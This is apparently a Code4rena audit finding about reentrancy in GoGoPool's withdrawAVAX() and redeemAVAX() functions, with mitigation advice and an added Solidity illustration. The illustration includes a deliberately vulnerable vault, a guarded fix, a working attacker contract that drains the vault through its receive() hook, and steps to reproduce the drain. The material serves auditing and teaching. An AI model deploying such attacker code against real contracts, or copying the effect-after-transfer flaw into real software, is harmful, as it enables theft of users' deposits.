Code4rena, 2022-12-gogopool-findings, issue 756
Jan 03, 2023

EXTERNAL CALL TO UNTRUSTED PARTIES

Source: Code4rena (github.com)
Tags: external call, untrusted parties, reentrancy vulnerability, manual tools, reentrancy guard

Lines of code
<https://github.com/code-423n4/2022-12-gogopool/blob/aec9928d8bdce8a5a4efe45f54c39d4fc7313731/contracts/contract/tokens/TokenggAVAX.sol#L202>

Vulnerability details

Impact

Functions in this contract, and functions it inherits, can be reentered by the recipient of an outgoing AVAX transfer while the original call is still in progress.

Proof of Concept

The withdrawAVAX() and redeemAVAX() functions (the linked line is in TokenggAVAX.sol; the original write-up names Vault.sol) make an external call to msg.sender by way of _safeTransferETH. Because the transfer is a low-level call that runs the recipient's fallback or receive code, a contract caller can reenter these functions, as well as other functions in this and other protocol contracts, before the original call completes. Other instances of this pattern exist throughout the code. In this particular case, however, msg.sender is not a registered network contract or the guardian but an arbitrary user, so the recipient is fully attacker-controlled. Whether reentry actually yields a profit depends on whether every state update (share burn, balance accounting) is performed before the transfer; if any state is written after the external call, a reentrant caller sees stale state.

Tools Used

Manual

Recommended Mitigation Steps

Add a reentrancy guard (a nonReentrant-style modifier) to withdrawAVAX() and redeemAVAX(), and keep all state changes before the external transfer (checks-effects-interactions) so that the guard is a second line of defence rather than the only one.
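The following is an added illustration, not GoGoPool code and not the warden's submission: a minimal, hypothetical vault (VulnerableVault) that sends AVAX to msg.sender before clearing the caller's balance, a minimal ReentrancyGuard, a hardened version (GuardedVault) that applies both the guard and checks-effects-interactions, and a Reenter contract that drains VulnerableVault by recursing from its receive() hook. All contract and function names are assumed for the example.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.17;

// Hypothetical vault with the flaw described in the finding: the external
// call to msg.sender happens before the caller's balance is zeroed.
contract VulnerableVault {
    mapping(address => uint256) public balances;

    function depositAVAX() external payable {
        balances[msg.sender] += msg.value;
    }

    // Withdraws the caller's full balance. A contract caller's receive()
    // runs during the low-level call and can call withdrawAVAX() again
    // while balances[msg.sender] is still non-zero.
    function withdrawAVAX() external {
        uint256 amount = balances[msg.sender];
        require(amount > 0, "nothing to withdraw");
        (bool ok, ) = msg.sender.call{value: amount}("");
        require(ok, "transfer failed");
        balances[msg.sender] = 0; // effect after interaction: too late
    }
}

// Minimal reentrancy guard (same idea as OpenZeppelin's ReentrancyGuard).
abstract contract ReentrancyGuard {
    uint256 private constant NOT_ENTERED = 1;
    uint256 private constant ENTERED = 2;
    uint256 private status = NOT_ENTERED;

    modifier nonReentrant() {
        require(status == NOT_ENTERED, "reentrant call");
        status = ENTERED;
        _;
        status = NOT_ENTERED;
    }
}

// Hardened version: guarded, and state is updated before the transfer.
contract GuardedVault is ReentrancyGuard {
    mapping(address => uint256) public balances;

    function depositAVAX() external payable {
        balances[msg.sender] += msg.value;
    }

    function withdrawAVAX() external nonReentrant {
        uint256 amount = balances[msg.sender];
        require(amount > 0, "nothing to withdraw");
        balances[msg.sender] = 0; // effect first
        (bool ok, ) = msg.sender.call{value: amount}(""); // interaction last
        require(ok, "transfer failed");
    }
}

// Attacker contract: deposits 1 AVAX, withdraws it, and re-enters from
// receive() for as long as the vault still holds at least 1 AVAC worth
// of other users' deposits. Against GuardedVault the nested call reverts
// with "reentrant call" and the whole attack transaction reverts.
contract Reenter {
    VulnerableVault public immutable target;

    constructor(VulnerableVault t) payable {
        target = t;
    }

    function attack() external {
        target.depositAVAX{value: 1 ether}();
        target.withdrawAVAX();
    }

    receive() external payable {
        if (address(target).balance >= 1 ether) {
            target.withdrawAVAX();
        }
    }
}
```

To reproduce in a local node or test framework: deploy VulnerableVault, have one or more honest accounts call depositAVAX() with a few AVAX, deploy Reenter with at least 1 AVAX and call attack(); the vault is emptied down to less than 1 AVAX. Repeating the same steps against GuardedVault leaves the honest deposits intact, because the second call to withdrawAVAX() hits the guard, and even without the guard the zeroed balance would make the nested call revert on the amount check.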
